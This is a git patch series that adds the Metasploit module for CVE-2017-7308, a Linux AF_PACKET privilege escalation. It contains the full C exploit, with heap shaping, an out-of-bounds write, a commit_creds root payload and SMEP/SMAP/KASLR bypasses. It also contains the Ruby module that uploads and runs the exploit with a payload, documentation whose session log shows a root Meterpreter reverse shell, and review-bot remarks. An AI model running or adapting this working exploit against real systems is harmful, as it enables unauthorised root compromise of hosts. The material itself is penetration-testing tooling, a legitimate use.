sizeof_priv, unsigned int timeout) { + int v = TPACKET_V3; + int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)); + if (rv < 0) { + dprintf("[-] setsockopt(PACKET_VERSION)\n"); + exit(EXIT_FAILURE); + } + + struct tpacket_req3 req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_frame_size = frame_size; + req.tp_block_nr = block_nr; + req.tp_frame_nr = (block_size * block_nr) / frame_size; + req.tp_retire_blk_tov = timeout; + req.tp_sizeof_priv = sizeof_priv; + req.tp_feature_req_word = 0; + + rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)); + if (rv < 0) { + dprintf("[-] setsockopt(PACKET_RX_RING)\n"); + 
exit(EXIT_FAILURE); + } +} + +int packet_socket_setup(unsigned int block_size, unsigned int frame_size, + unsigned int block_nr, unsigned int sizeof_priv, int timeout) { + int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + if (s < 0) { + dprintf("[-] socket(AF_PACKET)\n"); + exit(EXIT_FAILURE); + } + + packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, + sizeof_priv, timeout); + + struct sockaddr_ll sa; + memset(&sa, 0, sizeof(sa)); + sa.sll_family = PF_PACKET; + sa.sll_protocol = htons(ETH_P_ALL); + sa.sll_ifindex = if_nametoindex("lo"); + sa.sll_hatype = 0; + sa.sll_pkttype = 0; + sa.sll_halen = 0; + + int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa)); + if (rv < 0) { + dprintf("[-] bind(AF_PACKET)\n"); + exit(EXIT_FAILURE); + } + + return s; +} + +void packet_socket_send(int s, char *buffer, int size) { + struct sockaddr_ll sa; + memset(&sa, 0, sizeof(sa)); + sa.sll_ifindex = if_nametoindex("lo"); + sa.sll_halen = ETH_ALEN; + + if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa, + sizeof(sa)) < 0) { + dprintf("[-] sendto(SOCK_RAW)\n"); + exit(EXIT_FAILURE); + } +} + +void loopback_send(char *buffer, int size) { + int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); + if (s == -1) { + dprintf("[-] socket(SOCK_RAW)\n"); + exit(EXIT_FAILURE); + } + + packet_socket_send(s, buffer, size); +} + +int packet_sock_kmalloc() { + int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); + if (s == -1) { + dprintf("[-] socket(SOCK_DGRAM)\n"); + exit(EXIT_FAILURE); + } + return s; +} + +void packet_sock_timer_schedule(int s, int timeout) { + packet_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout); +} + +void packet_sock_id_match_trigger(int s) { + char buffer[16]; + packet_socket_send(s, &buffer[0], sizeof(buffer)); +} + +// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * * + +#define ALIGN(x, a) __ALIGN_KERNEL((x), (a)) +#define __ALIGN_KERNEL(x, a) __ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1) +#define __ALIGN_KERNEL_MASK(x, 
mask) (((x) + (mask)) & ~(mask)) + +#define V3_ALIGNMENT (8) +#define BLK_HDR_LEN (ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT)) + +#define ETH_HDR_LEN sizeof(struct ethhdr) +#define IP_HDR_LEN sizeof(struct iphdr) +#define UDP_HDR_LEN sizeof(struct udphdr) + +#define UDP_HDR_LEN_FULL (ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN) + +int oob_setup(int offset) { + unsigned int maclen = ETH_HDR_LEN; + unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN + + (maclen < 16 ? 16 : maclen)); + unsigned int macoff = netoff - maclen; + unsigned int sizeof_priv = (1u<<31) + (1u<<30) + + 0x8000 - BLK_HDR_LEN - macoff + offset; + return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100); +} + +void oob_write(char *buffer, int size) { + loopback_send(buffer, size); +} + +void oob_timer_execute(void *func, unsigned long arg) { + oob_setup(2048 + TIMER_OFFSET - 8); + + int i; + for (i = 0; i < 32; i++) { + int timer = packet_sock_kmalloc(); + packet_sock_timer_schedule(timer, 1000); + } + + char buffer[2048]; + memset(&buffer[0], 0, sizeof(buffer)); + + struct timer_list *timer = (struct timer_list *)&buffer[8]; + timer->function = func; + timer->data = arg; + timer->flags = 1; + + oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2); + + sleep(1); +} + +void oob_id_match_execute(void *func) { + int s = oob_setup(2048 + XMIT_OFFSET - 64); + + int ps[32]; + + int i; + for (i = 0; i < 32; i++) + ps[i] = packet_sock_kmalloc(); + + char buffer[2048]; + memset(&buffer[0], 0, 2048); + + void **xmit = (void **)&buffer[64]; + *xmit = func; + + oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2); + + for (i = 0; i < 32; i++) + packet_sock_id_match_trigger(ps[i]); +} + +// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * * + +void kmalloc_pad(int count) { + int i; + for (i = 0; i < count; i++) + packet_sock_kmalloc(); +} + +void pagealloc_pad(int count) { + packet_socket_setup(0x8000, 2048, count, 0, 100); +} + +// * * * * * * * * * * * * * * * Getting 
root * * * * * * * * * * * * * * * * + +typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); + +void get_root_payload(void) { + ((_commit_creds)(COMMIT_CREDS))( + ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0) + ); +} + +// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * + +#define CHUNK_SIZE 1024 + +int read_file(const char* file, char* buffer, int max_length) { + int f = open(file, O_RDONLY); + if (f == -1) + return -1; + int bytes_read = 0; + while (true) { + int bytes_to_read = CHUNK_SIZE; + if (bytes_to_read > max_length - bytes_read) + bytes_to_read = max_length - bytes_read; + int rv = read(f, &buffer[bytes_read], bytes_to_read); + if (rv == -1) + return -1; + bytes_read += rv; + if (rv == 0) + return bytes_read; + } +} + +void get_kernel_version(char* output, int max_length) { + struct utsname u; + int rv = uname(&u); + if (rv != 0) { + dprintf("[-] uname())\n"); + exit(EXIT_FAILURE); + } + assert(strlen(u.release) <= max_length); + strcpy(&output[0], u.release); +} + +#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0])) + +#define KERNEL_VERSION_LENGTH 32 + +void detect_versions() { + char version[KERNEL_VERSION_LENGTH]; + + get_kernel_version(&version[0], KERNEL_VERSION_LENGTH); + + int i; + for (i = 0; i < ARRAY_SIZE(kernels); i++) { + if (strcmp(&version[0], kernels[i].version) == 0) { + dprintf("[.] 
kernel version '%s' detected\n", kernels[i].version); + kernel = i; + return; + } + } + + dprintf("[-] kernel version not recognized\n"); + exit(EXIT_FAILURE); +} + +#define PROC_CPUINFO_LENGTH 4096 + +// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP +int smap_smep_enabled() { + char buffer[PROC_CPUINFO_LENGTH]; + char* path = "/proc/cpuinfo"; + int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH); + if (length == -1) { + dprintf("[-] open/read(%s)\n", path); + exit(EXIT_FAILURE); + } + + int rv = 0; + char* found = memmem(&buffer[0], length, "smep", 4); + if (found != NULL) + rv += 1; + found = memmem(&buffer[0], length, "smap", 4); + if (found != NULL) + rv += 2; + return rv; +} + +void check_smep_smap() { + int rv = smap_smep_enabled(); + +#if !ENABLE_SMEP_SMAP_BYPASS + if (rv >= 1) { + dprintf("[-] SMAP/SMEP detected, use ENABLE_SMEP_SMAP_BYPASS\n"); + exit(EXIT_FAILURE); + } +#endif + + switch(rv) { + case 1: // SMEP + CR4_DESIRED_VALUE = 0x406e0ul; + break; + case 2: // SMAP + CR4_DESIRED_VALUE = 0x407f0ul; + break; + case 3: // SMEP and SMAP + CR4_DESIRED_VALUE = 0x407f0ul; + break; + } +} + +// * * * * * * * * * * * * * Syslog KASLR bypass * * * * * * * * * * * * * * * + +#define SYSLOG_ACTION_READ_ALL 3 +#define SYSLOG_ACTION_SIZE_BUFFER 10 + +unsigned long get_kernel_addr_syslog() { + dprintf("[.] 
trying syslog...\n"); + + int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0); + if (size == -1) { + dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n"); + exit(EXIT_FAILURE); + } + + size = (size / getpagesize() + 1) * getpagesize(); + char *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE, + MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + + size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size); + if (size == -1) { + dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n"); + exit(EXIT_FAILURE); + } + + const char *needle1 = "Freeing SMP"; + char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1)); + if (substr == NULL) { + dprintf("[-] substring '%s' not found in dmesg\n", needle1); + exit(EXIT_FAILURE); + } + + for (size = 0; substr[size] != '\n'; size++); + + const char *needle2 = "ffff"; + substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2)); + if (substr == NULL) { + dprintf("[-] substring '%s' not found in dmesg\n", needle2); + exit(EXIT_FAILURE); + } + + char *endptr = &substr[16]; + unsigned long r = strtoul(&substr[0], &endptr, 16); + + r &= 0xfffffffffff00000ul; + r -= 0x1000000ul; + + return r; +} + +// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * * + +unsigned long get_kernel_addr_kallsyms() { + FILE *f; + unsigned long addr = 0; + char dummy; + char sname[256]; + char* name = "startup_64"; + char* path = "/proc/kallsyms"; + + dprintf("[.] 
trying %s...\n", path); + f = fopen(path, "r"); + if (f == NULL) { + dprintf("[-] open/read(%s)\n", path); + return 0; + } + + int ret = 0; + while (ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); + if (ret == 0) { + fscanf(f, "%s\n", sname); + continue; + } + if (!strcmp(name, sname)) { + fclose(f); + return addr; + } + } + + fclose(f); + dprintf("[-] kernel base not found in %s\n", path); + return 0; +} + +// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * * + +unsigned long get_kernel_addr_sysmap() { + FILE *f; + unsigned long addr = 0; + char path[512] = "/boot/System.map-"; + char version[32]; + get_kernel_version(&version[0], 32); + strcat(path, &version[0]); + dprintf("[.] trying %s...\n", path); + f = fopen(path, "r"); + if (f == NULL) { + dprintf("[-] open/read(%s)\n", path); + return 0; + } + + char dummy; + char sname[256]; + char* name = "startup_64"; + int ret = 0; + while (ret != EOF) { + ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); + if (ret == 0) { + fscanf(f, "%s\n", sname); + continue; + } + if (!strcmp(name, sname)) { + fclose(f); + return addr; + } + } + + fclose(f); + dprintf("[-] kernel base not found in %s\n", path); + return 0; +} + +// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * * + +unsigned long get_kernel_addr() { + unsigned long addr = 0; + + addr = get_kernel_addr_kallsyms(); + if (addr) return addr; + + addr = get_kernel_addr_sysmap(); + if (addr) return addr; + + addr = get_kernel_addr_syslog(); + if (addr) return addr; + + dprintf("[-] KASLR bypass failed\n"); + exit(EXIT_FAILURE); + + return 0; +} + +// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * * + +void check_procs() { + int min_procs = 2; + + int nprocs = 0; + nprocs = get_nprocs_conf(); + + if (nprocs < min_procs) { + dprintf("[-] system has less than %d processor cores\n", min_procs); + exit(EXIT_FAILURE); + } + + dprintf("[.] 
system has %d processors\n", nprocs); +} + +void exec_shell() { + int fd; + + fd = open("/proc/1/ns/net", O_RDONLY); + if (fd == -1) { + dprintf("error opening /proc/1/ns/net\n"); + exit(EXIT_FAILURE); + } + + if (setns(fd, CLONE_NEWNET) == -1) { + dprintf("error calling setns\n"); + exit(EXIT_FAILURE); + } + + system(SHELL); +} + +void fork_shell() { + pid_t rv; + + rv = fork(); + if (rv == -1) { + dprintf("[-] fork()\n"); + exit(EXIT_FAILURE); + } + + if (rv == 0) { + exec_shell(); + } +} + +bool is_root() { + // We can't simple check uid, since we're running inside a namespace + // with uid set to 0. Try opening /etc/shadow instead. + int fd = open("/etc/shadow", O_RDONLY); + if (fd == -1) + return false; + close(fd); + return true; +} + +void check_root() { + dprintf("[.] checking if we got root\n"); + + if (!is_root()) { + dprintf("[-] something went wrong =(\n"); + return; + } + + dprintf("[+] got r00t ^_^\n"); + + // Fork and exec instead of just doing the exec to avoid potential + // memory corruptions when closing packet sockets. + fork_shell(); +} + +bool write_file(const char* file, const char* what, ...) 
{ + char buf[1024]; + va_list args; + va_start(args, what); + vsnprintf(buf, sizeof(buf), what, args); + va_end(args); + buf[sizeof(buf) - 1] = 0; + int len = strlen(buf); + + int fd = open(file, O_WRONLY | O_CLOEXEC); + if (fd == -1) + return false; + if (write(fd, buf, len) != len) { + close(fd); + return false; + } + close(fd); + return true; +} + +void setup_sandbox() { + int real_uid = getuid(); + int real_gid = getgid(); + + if (unshare(CLONE_NEWUSER) != 0) { + dprintf("[-] unshare(CLONE_NEWUSER)\n"); + exit(EXIT_FAILURE); + } + + if (unshare(CLONE_NEWNET) != 0) { + dprintf("[-] unshare(CLONE_NEWUSER)\n"); + exit(EXIT_FAILURE); + } + + if (!write_file("/proc/self/setgroups", "deny")) { + dprintf("[-] write_file(/proc/self/set_groups)\n"); + exit(EXIT_FAILURE); + } + if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){ + dprintf("[-] write_file(/proc/self/uid_map)\n"); + exit(EXIT_FAILURE); + } + if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) { + dprintf("[-] write_file(/proc/self/gid_map)\n"); + exit(EXIT_FAILURE); + } + + cpu_set_t my_set; + CPU_ZERO(&my_set); + CPU_SET(0, &my_set); + if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { + dprintf("[-] sched_setaffinity()\n"); + exit(EXIT_FAILURE); + } + + if (system("/sbin/ifconfig lo up") != 0) { + dprintf("[-] system(/sbin/ifconfig lo up)\n"); + exit(EXIT_FAILURE); + } +} + +int main(int argc, char *argv[]) { + if (argc > 1) SHELL = argv[1]; + + dprintf("[.] starting\n"); + + check_procs(); + + dprintf("[.] checking kernel version\n"); + detect_versions(); + dprintf("[~] done, version looks good\n"); + + dprintf("[.] checking SMEP and SMAP\n"); + check_smep_smap(); + dprintf("[~] done, looks good\n"); + + dprintf("[.] setting up namespace sandbox\n"); + setup_sandbox(); + dprintf("[~] done, namespace sandbox set up\n"); + +#if ENABLE_KASLR_BYPASS + dprintf("[.] KASLR bypass enabled, getting kernel addr\n"); + KERNEL_BASE = get_kernel_addr(); + dprintf("[.] 
done, kernel text: %lx\n", KERNEL_BASE); +#endif + + dprintf("[.] commit_creds: %lx\n", COMMIT_CREDS); + dprintf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED); + +#if ENABLE_SMEP_SMAP_BYPASS + dprintf("[.] native_write_cr4: %lx\n", NATIVE_WRITE_CR4); +#endif + + dprintf("[.] padding heap\n"); + kmalloc_pad(KMALLOC_PAD); + pagealloc_pad(PAGEALLOC_PAD); + dprintf("[.] done, heap is padded\n"); + +#if ENABLE_SMEP_SMAP_BYPASS + dprintf("[.] SMEP & SMAP bypass enabled, turning them off\n"); + oob_timer_execute((void *)(NATIVE_WRITE_CR4), CR4_DESIRED_VALUE); + dprintf("[.] done, SMEP & SMAP should be off now\n"); +#endif + + dprintf("[.] executing get root payload %p\n", &get_root_payload); + oob_id_match_execute((void *)&get_root_payload); + dprintf("[.] done, should be root now\n"); + + check_root(); + + while (1) sleep(1000); + + return 0; +} diff --git a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb new file mode 100644 index 0000000000..8a9f177208 --- /dev/null +++ b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb 
@@ -0,0 +1,196 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = GreatRanking
+
+ include Msf::Post::File
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::System
+ include Msf::Post::Linux::Kernel
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'AF_PACKET packet_set_ring Privilege Escalation',
+ 'Description' => %q{
+ This module exploits a heap-out-of-bounds write in the packet_set_ring
+ function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel
+ to execute code as root (CVE-2017-7308).
+
+ The bug was initially introduced in 2011 and patched in version 4.10.6,
+ potentially affecting a large number of kernels; however this exploit
+ targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,
+ including Linux distros based on Ubuntu Xenial, such as Linux Mint.
+
+ The target system must have unprivileged user namespaces enabled and
+ two or more CPU cores.
+
+ Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation
+ may crash the kernel.
+
+ This module has been tested successfully on Linux Mint 18 (x86_64)
+ with kernel versions:
+
+ 4.8.0-34-generic;
+ 4.8.0-36-generic;
+ 4.8.0-39-generic;
+ 4.8.0-41-generic;
+ 4.8.0-42-generic;
+ 4.8.0-44-generic;
+ 4.8.0-45-generic.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Andrey Konovalov', # Discovery and C exploit
+ 'Brendan Coles' # Metasploit
+ ],
+ 'DisclosureDate' => 'Mar 29 2017',
+ 'Platform' => [ 'linux' ],
+ 'Arch' => [ ARCH_X86, ARCH_X64 ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Targets' => [[ 'Auto', {} ]],
+ 'Privileged' => true,
+ 'References' =>
+ [
+ [ 'EDB', '41994' ],
+ [ 'CVE', '2017-7308' ],
+ [ 'BID', '97234' ],
+ [ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ],
+ [ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ],
+ [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ],
+ [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ],
+ [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ]
+ ],
+ 'DefaultTarget' => 0))
+ register_options [
+ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+ ]
+ end
+
+ def base_dir
+ datastore['WritableDir'].to_s
+ end
+
+ def upload(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ register_file_for_cleanup path
+ end
+
+ def upload_and_chmodx(path, data)
+ upload path, data
+ cmd_exec "chmod +x '#{path}'"
+ end
+
+ def upload_and_compile(path, data)
+ upload "#{path}.c", data
+ output = cmd_exec "gcc -o #{path} #{path}.c"
+
+ unless output.blank?
+ print_error output
+ fail_with Failure::Unknown, "#{path}.c failed to compile"
+ end
+
+ cmd_exec "chmod +x #{path}"
+ register_file_for_cleanup path
+ end
+
+ def exploit_data(file)
+ path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file
+ fd = ::File.open path, 'rb'
+ data = fd.read fd.stat.size
+ fd.close
+ data
+ end
+
+ def live_compile?
+ return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
+
+ if has_gcc?
+ vprint_good 'gcc is installed'
+ return true
+ end
+
+ unless datastore['COMPILE'].eql? 'Auto'
+ fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
+ end
+ end
+
+ def check
+ version = kernel_release
+ unless version =~ /^4\.8\.0-(34|36|39|41|42|44|45)-generic/
+ vprint_error "Linux kernel version #{version} is not vulnerable"
+ return CheckCode::Safe
+ end
+ vprint_good "Linux kernel version #{version} is vulnerable"
+
+ arch = kernel_hardware
+ unless arch.include? 'x86_64'
+ vprint_error "System architecture #{arch} is not supported"
+ return CheckCode::Safe
+ end
+ vprint_good "System architecture #{arch} is supported"
+
+ cores = get_cpu_info[:cores].to_i
+ min_required_cores = 2
+ unless cores >= min_required_cores
+ vprint_error "System has less than #{min_required_cores} CPU cores"
+ return CheckCode::Safe
+ end
+ vprint_good "System has #{cores} CPU cores"
+
+ unless userns_enabled?
+ vprint_error 'Unprivileged user namespaces are not permitted'
+ return CheckCode::Safe
+ end
+ vprint_good 'Unprivileged user namespaces are permitted'
+
+ if kptr_restrict? && dmesg_restrict?
+ vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.'
+ return CheckCode::Safe
+ end
+
+ CheckCode::Appears
+ end
+
+ def exploit
+ if check != CheckCode::Appears
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ if is_root?
+ fail_with Failure::BadConfig, 'Session already has root privileges'
+ end
+
+ unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+ fail_with Failure::BadConfig, "#{base_dir} is not writable"
+ end
+
+ # Upload exploit executable
+ executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ executable_path = "#{base_dir}/#{executable_name}"
+ if live_compile?
+ vprint_status 'Live compiling exploit on system...'
+ upload_and_compile executable_path, exploit_data('poc.c')
+ else
+ vprint_status 'Dropping pre-compiled exploit on system...'
+ upload_and_chmodx executable_path, exploit_data('exploit')
+ end
+
+ # Upload payload executable
+ payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ # Launch exploit
+ print_status 'Launching exploit...'
+ output = cmd_exec "#{executable_path} #{payload_path}"
+ output.each_line { |line| vprint_status line.chomp }
+ end
+end
From 0b9a18274658f06a9971efeac7c8b9cdb634b098 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sat, 28 Apr 2018 01:51:28 +0000
Subject: [PATCH 2/6] Add documentation
---
.../af_packet_packet_set_ring_priv_esc.md | 92 +++++++++++++++++++
1 file changed, 92 insertions(+)
create mode 100644 documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md
diff --git a/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md
new file mode 100644
index 0000000000..1314da491b
--- /dev/null
+++ b/documentation/modules/exploit/linux/local/af_packet_packet_set_ring_priv_esc.md
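Review bot: `check` returns `CheckCode::Safe` with the message `Linux kernel version #{version} is not vulnerable` for every kernel outside the seven listed 4.8.0 builds, but the module description says the bug existed from 2011 until the 4.10.6 fix, so an unpatched host on another kernel is reported as safe. The message should say what was actually tested, e.g. `vprint_error "Linux kernel version #{version} is not a supported target"`, and a comment above `check` should state that `Safe` here means the bundled proof of concept has no offsets for this build, not that the kernel is patched. The same method misspells the sysctl in `kernel.dmesg_destrict`; it should read `kernel.dmesg_restrict`. In `exploit_data`, `::File.binread path` would replace the open/read/close sequence, which leaks the handle if the read raises.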
@@ -0,0 +1,92 @@
+## Description
+
+ This module exploits a heap-out-of-bounds write in the `packet_set_ring`
+ function in `net/packet/af_packet.c` (`AF_PACKET`) in the Linux kernel
+ to execute code as `root` (CVE-2017-7308).
+
+ The bug was initially introduced in 2011 and patched in version 4.10.6,
+ potentially affecting a large number of kernels; however this exploit
+ targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,
+ including Linux distros based on Ubuntu Xenial, such as Linux Mint.
+
+ The target system must have unprivileged user namespaces enabled and
+ two or more CPU cores.
+
+ Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation
+ may crash the kernel.
+
+
+## Vulnerable Application
+
+ This module has been tested successfully on Linux Mint 18 (x86_64)
+ with kernel versions:
+
+ * 4.8.0-34-generic
+ * 4.8.0-36-generic
+ * 4.8.0-39-generic
+ * 4.8.0-41-generic
+ * 4.8.0-42-generic
+ * 4.8.0-44-generic
+ * 4.8.0-45-generic
+
+
+## Verification Steps
+
+ 1. Start `msfconsole`
+ 2. Get a session
+ 3. `use af_packet_packet_set_ring_priv_esc`
+ 4. `set SESSION [SESSION]`
+ 5. `check`
+ 6. `run`
+ 7. You should get a new *root* session
+
+
+## Options
+
+ **SESSION**
+
+ Which session to use, which can be viewed with `sessions`
+
+ **WritableDir**
+
+ A writable directory file system path. (default: `/tmp`)
+
+ **COMPILE**
+
+ Options: `Auto` `True` `False` (default: `Auto`)
+
+ Whether the exploit should be live compiled with `gcc` on the target system,
+ or uploaded as a pre-compiled binary.
+
+ `Auto` will first determine if `gcc` is installed to compile live on the system,
+ and fall back to uploading a pre-compiled binary.
+
+
+## Scenarios
+
+ ```
+ msf5 > use exploit/linux/local/af_packet_packet_set_ring_priv_esc
+ msf5 exploit(linux/local/af_packet_packet_set_ring_priv_esc) > set session 1
+ session => 1
+ msf5 exploit(linux/local/af_packet_packet_set_ring_priv_esc) > run
+
+ [*] Started reverse TCP handler on 172.16.191.188:4444
+ [*] Writing '/tmp/.ZxgWSP2O1.c' (19378 bytes) ...
+ [*] Writing '/tmp/.jfPl4uPX2' (207 bytes) ...
+ [*] Launching exploit...
+ [*] Sending stage (857352 bytes) to 172.16.191.207
+ [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.207:41882) at 2018-04-27 19:55:21 -0400
+ [+] Deleted /tmp/.ZxgWSP2O1.c
+ [+] Deleted /tmp/.ZxgWSP2O1
+ [+] Deleted /tmp/.jfPl4uPX2
+
+ meterpreter > getuid
+ Server username: uid=0, gid=0, euid=0, egid=0
+ meterpreter > sysinfo
+ Computer : 172.16.191.207
+ OS : LinuxMint 18 (Linux 4.8.0-45-generic)
+ Architecture : x64
+ BuildTuple : i486-linux-musl
+ Meterpreter : x86/linux
+ ```
+
From c5f980f63303408b03cce44028c388c349e319c8 Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Wed, 16 May 2018 02:38:19 +0000
Subject: [PATCH 3/6] GoodRanking
---
.../exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
index 8a9f177208..7ae5227d77 100644
--- a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
+++ b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb
@@ -4,7 +4,7 @@ ## class MetasploitModule < Msf::Exploit::Local - Rank = GreatRanking + Rank = GoodRanking include Msf::Post::File include Msf::Post::Linux::Priv
From ce5b24eda07f8c4cb4991b0a96952115cbf6130c Mon Sep 17 00:00:00 2001
From: Tim W Date: Wed, 16 May 2018 20:34:32 +0800 Subject: [PATCH 4/6] fork early and cleanup files in module --- data/exploits/cve-2017-7308/poc.c | 11 +++++++++++ .../linux/local/af_packet_packet_set_ring_priv_esc.rb | 9 ++++++--- 2 files changed, 17 insertions(+), 3 deletions(-) diff --git a/data/exploits/cve-2017-7308/poc.c b/data/exploits/cve-2017-7308/poc.c index 713e7cb98c..69df692343 100644 --- a/data/exploits/cve-2017-7308/poc.c +++ b/data/exploits/cve-2017-7308/poc.c @@ -741,6 +741,17 @@ int main(int argc, char *argv[]) { check_smep_smap(); dprintf("[~] done, looks good\n"); + pid_t pid = fork(); + if (pid == -1) { + dprintf("[-] fork()\n"); + exit(EXIT_FAILURE); + } + + if (pid != 0) { + dprintf("[.] performing exploit...\n"); + return 0; + } + dprintf("[.] setting up namespace sandbox\n"); setup_sandbox(); dprintf("[~] done, namespace sandbox set up\n"); diff --git a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb index 7ae5227d77..06b114a018 100644 --- a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb +++ b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb @@ -79,9 +79,7 @@ class MetasploitModule < Msf::Exploit::Local def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." - rm_f path write_file path, data - register_file_for_cleanup path end def upload_and_chmodx(path, data) @@ -99,7 +97,6 @@ class MetasploitModule < Msf::Exploit::Local end cmd_exec "chmod +x #{path}" - register_file_for_cleanup path end def exploit_data(file) @@ -179,6 +176,7 @@ class MetasploitModule < Msf::Exploit::Local if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile executable_path, exploit_data('poc.c') + rm_f "#{executable_path}.c" else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx executable_path, exploit_data('exploit') 
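Review bot: With `register_file_for_cleanup` removed from `upload` and `upload_and_compile` (hunks at -79 and -99), the only deletions left are the explicit `rm_f` calls in `exploit` (hunks at -179 and -192), and none of them runs on a failure path. When `upload_and_compile` reaches `fail_with Failure::Unknown, "#{path}.c failed to compile"`, the uploaded source stays in `WritableDir`, and an error raised by a later `cmd_exec` would leave the executable and payload there as well, readable by other local users of the assessed host. Deleting the source before that `fail_with` (`rm_f "#{path}.c"`) and moving the final `rm_f` calls into an `ensure` block in `exploit` would cover those paths. `upload_and_compile` and `exploit` both start and end outside these hunks, so this rests on the visible lines only.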
